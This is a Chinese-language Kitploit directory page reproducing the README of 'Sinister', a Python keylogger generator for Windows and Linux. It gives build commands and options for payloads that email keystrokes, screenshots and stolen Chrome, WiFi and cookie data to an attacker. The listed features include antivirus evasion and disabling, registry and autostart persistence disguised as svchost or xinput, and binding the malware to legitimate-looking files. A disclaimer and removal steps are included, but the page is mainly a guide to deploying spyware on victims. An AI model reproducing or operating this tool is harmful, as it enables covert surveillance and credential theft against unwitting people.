Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Sinister — Sinister是一个Windows/Linux键盘记录器生成器,它通过电子邮件发送键盘记录以及其他有价值的目标信息。 | Kitploit
工具/GitHubGitHub/pushpenderindia/sinister
密码破解Payload生成持久化机制数据泄露信息收集后渗透利用红队远程访问工具
GitHubpushpenderindia/sinister

Sinister

Sinister是一个Windows/Linux键盘记录器生成器,它通过电子邮件发送键盘记录以及其他有价值的目标信息。

查看仓库
465931年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Sinister Logo

Sinister

Hacker GIF

root@kitploit:~
                    这个小型的Python脚本能够完成非常出色的工作。

Sinister是一个键盘记录器生成器,适用于Windows/Linux,它能通过电子邮件发送按键记录和屏幕截图,以及其它有价值的受害者信息,使用Python 3编写。

免责声明

:computer: 本项目仅用于正当目的和个人使用。

本软件按“原样”提供,不附带任何形式的明示或暗示担保。您自行承担使用本软件的风险。使用完全由最终用户负责。开发者不承担任何责任,也不对因使用本程序而造成的任何误用或损害负责。

功能特性

  • 支持Windows/Linux
  • 通过电子邮件通知新受害者
  • 无法被检测
  • 持久化
  • 在生成载荷前验证电子邮件凭据
  • 能够接收任何电子邮件提供商的按键记录,如GMAIL、YAHOO、OUTLOOK、自定义SMTP
  • SMTP服务器/端口
服务器名称SMTP服务器SMTP端口
GMAILsmtp.gmail.com587
OUTLOOKsmtp-mail.outlook.com587
YAHOOsmtp.mail.yahoo.com587
  • 通过电子邮件发送受害者电脑屏幕的截图
  • 创建零依赖的可执行二进制文件
  • 创建约5MB的小型载荷,具备高级功能
  • 在生成载荷前对其进行混淆处理,从而绕过部分杀毒软件
  • 生成的载荷使用base64编码,使得逆向工程极其困难
  • 终止受害者电脑上的杀毒软件并尝试禁用安全防护功能
  • 炫酷的彩色界面,用于生成载荷
  • 攻击者端:创建载荷时,脚本自动检测缺失依赖并安装它们
  • 根据活动窗口名称区分日志数据(查看图片以更好理解)
  • 能够为恶意文件添加自定义图标
  • 内置捆绑器,可将键盘记录器与任意文件[.pdf, .txt, .exe等]捆绑,前台运行合法文件,后台以服务形式运行恶意代码
  • 检查系统中是否已有运行实例,如果发现正在运行的实例,则仅执行合法文件[多实例禁止器,避免接收重复的电子邮件日志]
  • 攻击者可以使用Linux系统为Windows/Linux操作系统创建/编译载荷,但使用Windows机器只能为Windows创建/编译可执行文件
  • 从受害者系统检索已保存的密码并发送给攻击者
内置窃取器可以窃取以下内容:
Chrome浏览器(已保存密码)
WiFi(已保存密码)
Chrome Cookies(登录数据、Cookies、历史记录)
Firefox Cookies(cookies.sqlite)

注意:自定义窃取器已编码,不依赖LaZagne

  • 获取并发送受害者设备的有用信息
以下信息被获取并发送:
操作系统
计算机名称
用户名
公网IPv4
  • 如果你的载荷无法执行,使用--debug参数运行exe文件,在前台显示CMD窗口

重要提示

2022年5月30日,谷歌移除了低安全应用功能,因此不要使用Gmail密码:

  • 在你的攻击者Gmail上启用双重验证
  • 创建应用专用密码
  • 在创建载荷时使用该应用专用密码
  • 如何创建应用专用密码:点击此处

测试环境

Kali) Kali Linux - ROLLING EDITION

Windows) Windows 10

Windows) Windows 8.1 - Pro

Windows) Windows 7 - Ultimate

前提条件

  • Python 3.X
  • 几个外部模块

如何在Linux中使用

root@kitploit:~
# Navigate to the /opt directory (optional)
$ cd /opt/

# Clone this repository
$ git clone https://github.com/PushpenderIndia/Sinister.git

# Navigate to Sinister folder
$ cd Sinister

# Installing dependencies
$ bash installer_linux.sh

*** Note When The Python Installer DialogBox Appear while executing installer_linux.sh ***
    * Click on custom install 
    * Select Path to : C:/Python37-32
    ### So that the python is installed in this path (Inside Wine) : ~/.wine/drive_c/Python37-32

# If you are getting any errors while executing installer_linux.sh, try to install using installer_linux.py
$ python3 installer_linux.py

$ chmod +x Sinister.py
$ python3 Sinister.py --help

# Making Payload/RAT
$ python3 Sinister.py -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# Making Payload using GMAIL SMTP Server, Port Configuration (Default SMTP Server = smtp.gmail.com, Default SMTP Port = 587)
$ python3 Sinister.py -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# Making Payload using OUTLOOK SMTP Server, Port Configuration
$ python3 Sinister.py -e [email protected] -p YourEmailPass -x smtp-mail.outlook.com -y 587 -l -o output_file_name --icon icon_path

# Making Payload using YAHOO SMTP Server, Port Configuration
$ python3 Sinister.py -e [email protected] -p YourEmailPass -x smtp.mail.yahoo.com -y 587 -l -o output_file_name --icon icon_path

Note: You can also use our custom icons from the icon folder, just use them like this  --icon icon/pdf.ico

如何在Windows中使用

root@kitploit:~
# Install dependencies 
$ Install latest python 3.x

# Clone this repository
$ git clone https://github.com/PushpenderIndia/Sinister.git

# Go into the repository
$ cd Sinister

# Installing dependencies
$ python -m pip install -r requirements.txt

# Open Sinister.py in Text editor and Configure Line 16 WINDOWS_PYTHON_PYINSTALLER_PATH = "C:/Python37-32/Scripts/pyinstaller.exe" 

# Getting Help Menu
$ python Sinister.py --help

# Making Payload/RAT
$ python Sinister.py -e [email protected] -p YourEmailPass -w -o output_file_name --icon icon_path

# Making Payload using GMAIL SMTP Server, Port Configuration (Default SMTP Server = smtp.gmail.com, Default SMTP Port = 587)
$ python Sinister.py -e [email protected] -p YourEmailPass-w -o output_file_name --icon icon_path

# Making Payload using OUTLOOK SMTP Server, Port Configuration
$ python Sinister.py -e [email protected] -p YourEmailPass -x smtp-mail.outlook.com -y 587 -w -o output_file_name --icon icon_path

# Making Payload using YAHOO SMTP Server, Port Configuration
$ python Sinister.py -e [email protected] -p YourEmailPass -x smtp.mail.yahoo.com -y 587 -w -o output_file_name --icon icon_path

Note: You can also use our custom icons from the icon folder, just use them like this  --icon icon/pdf.ico

如何更新

  • 运行updater.py自动更新,或从本GitHub仓库下载最新的zip压缩包
  • 注意:使用updater.py需要安装Git

注意:恶意文件将保存在Sinister/文件夹内的dist/文件夹中

可用参数

  • 可选参数

注意:必须指定 -w/--windows 或 -l/--linux

  • 必需参数

新截图:

获取帮助

生成载荷

接收报告

日志数据根据活动窗口名称区分 ~ v1.3及更高版本添加的功能

检索并发送保存的Chrome浏览器密码

  • 注意:要使用此功能,请在创建键盘记录器时指定 -s 或 --steal-password

检索并发送保存的WiFi密码

  • 注意:要使用此功能,请在创建键盘记录器时指定 -s 或 --steal-password

同时也参考这些旧图片

~旧截图:

获取帮助

运行Sinister.py脚本

构建完成

键盘记录器运行时,添加注册表以实现持久化

创建自身副本并保存在Roaming目录下

输入随机文本来测试键盘记录器

Sinister发送的第一份报告

登录facebook ~ 受害者

报告2 - Facebook凭据的按键记录

报告3 - 附带截图

调试问题

尝试运行离线键盘记录器以测试离线按键捕获,并通过运行以下命令调试键盘记录器问题:

在编译和原始两种模式下运行test_key.py,找出问题所在

像这样运行:python test_key.py

也像这样编译: pyinstaller --onefile test_key.py --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=pynput.keyboard

运行后,开始输入内容, 结果将每隔10秒显示在命令提示符中

离线键盘记录器的文件位于TestKeylogger文件夹中

  • 如果载荷在受害者系统上无法执行
root@kitploit:~
1. 使用--debug标志创建新载荷
2. 通过cmd运行载荷exe [不要通过双击执行载荷]
3. CMD将显示更具体的错误,请在Issue区提交该问题

在Windows中移除Sinister:

方法1:

  • 转到开始,输入regedit并运行第一个程序,这将打开注册表编辑器。
  • 导航到以下路径:计算机\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 应该有一个名为svchost的条目,右键点击该条目并选择删除。
  • 转到你的用户路径 > AppData > Roaming,你会看到一个名为“svchost.exe”的文件,这是RAT,右键点击 > 删除。
  • 重启系统。

方法2:

  • 在受感染系统上运行"RemoveSinister.bat",然后重启PC以停止当前正在运行的恶意文件。

在Linux中移除Sinister:

  • 使用任何文本编辑器打开自动启动文件, 自动启动文件路径: ~/.config/autostart/xinput.desktop

  • 删除以下5行:

    root@kitploit:~
       [Desktop Entry]
       Type=Application
       X-GNOME-Autostart-enabled=true
       Name=Xinput
       Exec="destination_file_name"
    
  • 注意:destination_file_name 是你使用-o参数为键盘记录器指定的恶意文件名

  • 重启系统,然后删除存储在该路径下的恶意文件

  • 键盘记录器存储路径:~/.config/xnput

贡献者

  • 专属贡献者列表:贡献者

欢迎任何形式的贡献!

注意:如果你应该在贡献者列表中但我们忘记了你,请告诉我们!

TODO

  • 提出你自己的功能
  • 添加新功能
  • 贡献GUI版本
下载工具
短参数完整参数描述
-h--help显示此帮助信息并退出
-i INTERVAL--interval INTERVAL报告间隔时间(秒)。默认值=120
-t TIME_PERSISTENT--persistence TIME_PERSISTENT在__秒后实现持久化。默认值=10
-x SMTP_Server--smtp自定义SMTP服务器。默认值="smtp.gmail.com"
-y SMTP_Port--port自定义SMTP端口。默认值=587
-w--windows生成Windows可执行文件
-l--linux生成Linux可执行文件
-s--steal-password从受害者机器窃取已保存的密码[支持的操作系统:Windows]
-b file.txt--bind LEGITIMATE_FILE_PATH.pdf自动捆绑器:指定合法文件路径。[支持的操作系统:Windows]
-d--debug载荷在前台运行并显示CMD窗口,以便获取适当的执行错误
短参数完整参数描述
--icon ICON指定图标路径,恶意文件的图标[注意:必须是.ico格式]
-e EMAIL--email EMAIL用于接收报告的电子邮件地址
-p PASSWORD--password PASSWORD由-e参数指定的电子邮件地址的密码
-o OUT--out OUT输出文件名

Pushpender Singh

:computer:

Thomas Kunwar

:computer:

krasnova19

:computer:

sarchish5

:computer:

chiragcode11

:computer:

C4RR0T02

:computer: